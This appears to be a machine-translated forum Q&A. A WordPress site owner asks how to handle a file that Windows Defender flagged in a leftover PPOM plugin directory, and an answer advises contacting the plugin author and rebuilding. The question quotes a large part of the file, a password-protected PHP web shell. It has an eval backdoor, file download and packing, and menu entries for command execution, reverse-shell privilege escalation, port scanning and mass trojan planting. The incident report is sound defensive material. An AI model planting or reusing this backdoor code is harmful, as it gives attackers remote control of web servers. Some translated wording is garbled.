问题描述
Windows Defender在将实时站点的wordpress备份提取到本地主机时发现了威胁。
警告是Exploit:JS/ShellCode.gen,这是我的警告页面的屏幕截图。
因此,我仔细查看了该文件caches_data_thumb.PHP。
这是在目录“ ppom”文件中。将已安装的PPOM into google shows this was a plugin放回去,以添加WooCommerce产品的其他选项。该插件在安装后不久就被删除了,但是目录仍然在这里。
我在编辑器中打开了caches_data_thumb.PHP,其中包含一些带有汉字的狡猾代码,请参见下文:
<?PHP
header("Content-type:text/html;charset=gbk");
$password='wp_caches';
$shellname='Hello By xxxx';
$myurl=null;
error_reporting(0);
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
if($_POST['postpass']){
if($_POST['postpass'] == postpass){
setcookie('postpass',md5($_POST['postpass']));
hmlogin();
}else{
echo '<CENTER>用户或密码错误</CENTER>';
}
}
islogin($shellname,$myurl);
exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
$dir = do_show($_GET['pack']);
$zip = new eanver($dir);
$out = $zip->out;
do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
css_main();
start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS,3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "PHPinfo") die(PHPinfo());
if($eanver == 'logout'){
setcookie('postpass',null);
die('<Meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"信息操作" => array("upfiles" => "上传文件","PHPinfo" => "基本信息","info_f" => "系统信息","PHPcode" => "执行PHP脚本"),"提权工具" => array("sqlshell" => "执行sql执行","MysqL_exec" => "MysqL操作","myexp" => "MysqL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文
etc etc,goes on for 100s of lines...
在该目录中也有其他代码。带有html的index.html与屋顶更换公司的着陆页!
现在我的问题是,我该向谁投诉?插件?我如何保证WooCommerce网站的完整性并清理这些混乱情况?谁能说没有更多的垃圾隐藏在子文件夹的子文件夹中了?
解决方法
该问题可能已经结束,而IMO尚未出现的唯一原因是赏金。不过,要解决您的问题,如果您确定它来自问题,那么在这种情况下,我将使用的程序是
-
向主题的创建者介绍以下情况:their website或tweet to them。
如果他们对您不好,请检查产品,包括您刚刚在此处分享的信息以及导致您进行审查的原因。
关于WooCommerce,重新开始会有多困难?在不同的位置重现相同内容,重新开始。这样,您就可以放心,它不会有任何问题。